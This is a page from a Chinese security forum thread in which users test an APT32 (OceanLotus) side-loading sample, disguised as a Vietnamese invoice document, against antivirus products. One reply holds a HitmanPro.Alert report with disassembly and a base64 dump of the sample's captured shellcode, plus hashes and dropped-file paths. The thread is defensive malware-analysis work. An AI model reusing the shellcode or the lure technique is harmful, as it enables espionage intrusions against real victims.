收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 #APT32(OceanLotus)(3.11)白加黑样本
12
返回列表 发新帖
楼主: hsks
 收起左侧

[病毒样本] #APT32(OceanLotus)(3.11)白加黑样本

[复制链接]
Kinhold
发表于 2021-3-12 10:11:21 | 显示全部楼层
fdsax 发表于 2021-3-12 09:41
拉黑够快的

流式更新是真的
回复

举报

,就一个.
发表于 2021-3-12 11:48:52 | 显示全部楼层
智量双击miss 不知道是不是没行为 还是样本太牛逼
回复

举报

hsks
 楼主| 发表于 2021-3-12 12:04:20 | 显示全部楼层
,就一个. 发表于 2021-3-12 11:48
智量双击miss 不知道是不是没行为 还是样本太牛逼

连接了个域名
反馈给火绒看看
回复

举报

sichuanwenxuan
发表于 2021-3-12 12:12:39 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

,就一个.
发表于 2021-3-12 15:35:37 | 显示全部楼层
hsks 发表于 2021-3-12 12:04
连接了个域名
反馈给火绒看看

双击  HitmanPro 瞬间拦截 牛逼啊

Mitigation   HeapHeapProtect
Timestamp    2021-03-12T07:32:27

Platform     10.0.19042/x64 v889 06_8e
PID          7652
WoW          x86
Feature      003D0A30000003A6
Application  D:\下载\Hoa don tien no\Hoa don tien no\Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe
Created      2021-03-12T07:32:24
Description  Microsoft Office Word 12

Callee Type  AllocateVirtualMemory

Shellcode (HHA) (0x00001000 bytes)
Owner of CALLER: (anonymous; allocated by 5AB9126C, wwlib.dll)

OwnerModule
Name         wwlib.dll
Thumbprint   f7b582887f4d99a014b8d8dc3b1417f7469a6131efd821e5383274371e76c302
SHA-256      fa259f953cd319da9bdcd84d40b2a89869bd307e8f9206b5653e78666f08f5b8
SHA-1        2620e17b03d829a740960a2c4d907b2f7ea2219c
MD5          c6423f8911ed975ffa735eb14573e9f7

02E40496  ff942404010000           CALL         DWORD [ESP+0x104]
02E4049D  8bd8                     MOV          EBX, EAX
02E4049F  895c2414                 MOV          [ESP+0x14], EBX
02E404A3  85db                     TEST         EBX, EBX
02E404A5  0f8401020000             JZ           0x2e406ac
02E404AB  8b4704                   MOV          EAX, [EDI+0x4]
02E404AE  33d2                     XOR          EDX, EDX
02E404B0  33c9                     XOR          ECX, ECX
02E404B2  89442444                 MOV          [ESP+0x44], EAX
02E404B6  33f6                     XOR          ESI, ESI
02E404B8  c744241801000000         MOV          DWORD [ESP+0x18], 0x1
02E404C0  660f1f440000             NOP          WORD [EAX+EAX+0x0]
02E404C6  f6c27f                   TEST         DL, 0x7f
02E404C9  7404                     JZ           0x2e404cf
02E404CB  03d2                     ADD          EDX, EDX
02E404CD  eb0d                     JMP          0x2e404dc

----- SNIP HERE -----
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
----- END SNIP -----

Stack Trace
#  Address  Module                   Location
-- -------- ------------------------ ----------------------------------------
1  750F3DE1 KernelBase.dll           VirtualAlloc +0x41

2  02E4049D (anonymous; wwlib.dll)  
            8bd8                     MOV          EBX, EAX
            895c2414                 MOV          [ESP+0x14], EBX
            85db                     TEST         EBX, EBX
            0f8401020000             JZ           0x2e406ac
            8b4704                   MOV          EAX, [EDI+0x4]
            33d2                     XOR          EDX, EDX
            33c9                     XOR          ECX, ECX
            89442444                 MOV          [ESP+0x44], EAX
            33f6                     XOR          ESI, ESI
            c744241801000000         MOV          DWORD [ESP+0x18], 0x1
            660f1f440000             NOP          WORD [EAX+EAX+0x0]
            f6c27f                   TEST         DL, 0x7f
            7404                     JZ           0x2e404cf
            03d2                     ADD          EDX, EDX
            eb0d                     JMP          0x2e404dc

3  02E40015 (anonymous; wwlib.dll)  
4  5AB91436 wwlib.dll                FMain +0x56
5  2F9F15D7 Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe
6  2F9F155D Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe
7  76C5FA29 kernel32.dll             BaseThreadInitThunk +0x19
8  77187C7E ntdll.dll                RtlGetAppContainerNamedObjectPath +0x11e
9  77187C4E ntdll.dll                RtlGetAppContainerNamedObjectPath +0xee

Loaded Modules (51)
-----------------------------------------------------------------------------
2F9F0000-2FA47000 Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe (Microsoft Corporation),
                  version: 12.0.4518.1014
77120000-772C3000 ntdll.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
76C40000-76D30000 KERNEL32.dll (Microsoft Corporation),
                  version: 10.0.19041.804 (WinBuild.160101.0800)
741E0000-742E0000 hmpalert.dll (SurfRight B.V.),
                  version: 3.8.8.889
74FD0000-751E4000 KERNELBASE.dll (Microsoft Corporation),
                  version: 10.0.19041.804 (WinBuild.160101.0800)
67B50000-67BEF000 apphelp.dll (Microsoft Corporation),
                  version: 10.0.19041.572 (WinBuild.160101.0800)
5ABC0000-5AC5B000 MSVCR80.dll (Microsoft Corporation),
                  version: 8.00.50727.9672
759B0000-75A6F000 msvcrt.dll (Microsoft Corporation),
                  version: 7.0.19041.546 (WinBuild.160101.0800)
5AB90000-5ABB2000 wwlib.dll (),
                  version:
75280000-75834000 SHELL32.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
76200000-7627B000 msvcp_win.dll (Microsoft Corporation),
                  version: 10.0.19041.789 (WinBuild.160101.0800)
76D30000-76E50000 ucrtbase.dll (Microsoft Corporation),
                  version: 10.0.19041.789 (WinBuild.160101.0800)
76610000-767A6000 USER32.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
764E0000-764F8000 win32u.dll (Microsoft Corporation),
                  version: 10.0.19041.867 (WinBuild.160101.0800)
76AA0000-76AC3000 GDI32.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
76120000-761FC000 gdi32full.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
76AD0000-76AF5000 IMM32.DLL (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
75840000-758C7000 SHCORE.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
76810000-76A91000 combase.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
76B00000-76BC0000 RPCRT4.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
75950000-759AD000 bcryptPrimitives.dll (Microsoft Corporation),
                  version: 10.0.19041.662 (WinBuild.160101.0800)
76410000-76455000 shlwapi.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
74940000-74F48000 windows.storage.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
74910000-74934000 Wldp.dll (Microsoft Corporation),
                  version: 10.0.19041.662 (WinBuild.160101.0800)
76BC0000-76C3A000 advapi32.dll (Microsoft Corporation),
                  version: 10.0.19041.610 (WinBuild.160101.0800)
76460000-764D6000 sechost.dll (Microsoft Corporation),
                  version: 10.0.19041.789 (WinBuild.160101.0800)
76320000-76403000 ole32.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
74890000-7489F000 kernel.appcore.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
74340000-743B4000 uxtheme.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
6E3A0000-6E463000 PROPSYS.dll (Microsoft Corporation),
                  version: 7.0.19041.746 (WinBuild.160101.0800)
76280000-76316000 OLEAUT32.dll (Microsoft Corporation),
                  version: 10.0.19041.804 (WinBuild.160101.0800)
758D0000-7594E000 clbcatq.dll (Microsoft Corporation),
                  version: 2001.12.10941.16384 (WinBuild.160101.080
748F0000-74908000 profapi.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
770D0000-7710B000 CFGMGR32.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
678E0000-678FB000 edputil.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
6E300000-6E393000 Windows.StateRepositoryPS.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
68320000-68530000 comctl32.dll (Microsoft Corporation),
                  version: 6.10 (WinBuild.160101.0800)
6DA10000-6DBB9000 urlmon.dll (Microsoft Corporation),
                  version: 11.00.19041.867 (WinBuild.160101.0800)
6D7E0000-6DA0B000 iertutil.dll (Microsoft Corporation),
                  version: 11.00.19041.844 (WinBuild.160101.0800)
5B820000-5B8A3000 policymanager.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
5B7B0000-5B815000 msvcp110_win.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
74530000-74558000 SspiCli.dll (Microsoft Corporation),
                  version: 10.0.19041.488 (WinBuild.160101.0800)
75B50000-75BAE000 coml2.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
635F0000-636CB000 wintypes.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
5B730000-5B7A1000 appresolver.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)
5B6E0000-5B728000 Bcp47Langs.dll (Microsoft Corporation),
                  version: 10.0.19041.746 (WinBuild.160101.0800)
5B6C0000-5B6DF000 SLC.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
748C0000-748E5000 USERENV.dll (Microsoft Corporation),
                  version: 10.0.19041.572 (WinBuild.160101.0800)
5B6A0000-5B6BC000 sppc.dll (Microsoft Corporation),
                  version: 10.0.19041.546 (WinBuild.160101.0800)
5B660000-5B69D000 OneCoreCommonProxyStub.dll (Microsoft Corporation),
                  version: 10.0.19041.610 (WinBuild.160101.0800)
5B2C0000-5B660000 OneCoreUAPCommonProxyStub.dll (Microsoft Corporation),
                  version: 10.0.19041.844 (WinBuild.160101.0800)

Process Trace
1  D:\下载\Hoa don tien no\Hoa don tien no\Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe [7652] 2021-03-12T07:32:27
2  C:\Windows\explorer.exe [3888] 2021-03-12T07:30:57
   C:\WINDOWS\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding
3  C:\Windows\System32\svchost.exe [652] 2021-03-12T07:30:32
   C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
4  C:\Windows\System32\services.exe [960] 2021-03-12T07:30:32
5  C:\Windows\System32\wininit.exe [888] 2021-03-12T07:30:32
   wininit.exe
6  C:\Windows\System32\smss.exe [648] 2021-03-12T07:30:28 3.9s
   \SystemRoot\System32\smss.exe 000000cc 00000084
7  C:\Windows\System32\smss.exe [560] 2021-03-12T07:30:27
   \SystemRoot\System32\smss.exe

Services
652  BrokerInfrastructure
652  DcomLaunch
652  PlugPlay
652  Power
652  SystemEventsBroker

Dropped Files
1  C:\Users\zt656\AppData\Local\Temp\Office.doc
     Dropped by \Device\HarddiskVolume5\下载\Hoa don tien no\Hoa don tien no\Noi dung chi tiet hoa don tien no gui chi Thuong . Cong hoa xa hoi chu nghia Viet Nam Doc lap tu do hanh phuc.exe [7652]
1  C:\Users\zt656\AppData\Local\Temp\OptaneIconOverlay.ico
     Dropped by \Device\HarddiskVolume3\Windows\explorer.exe [3888]

Thumbprints
c6b7a20aac5e983aeadd13cec4465a0fe62ace4290be56eda79570fd4605ffde (code)
f7b582887f4d99a014b8d8dc3b1417f7469a6131efd821e5383274371e76c302 (ownermodule)
5acbe81129129554aea54f40003596ddafec44afa6890316aa5b8abd2054420b (pfn)


评分

参与人数 1人气 +2 收起 理由
hsks + 2 感谢支持,欢迎常来: )

查看全部评分

回复

举报

NT狼狼
发表于 2021-3-12 15:46:14 | 显示全部楼层
毒霸

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-5 04:17 , Processed in 0.087967 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表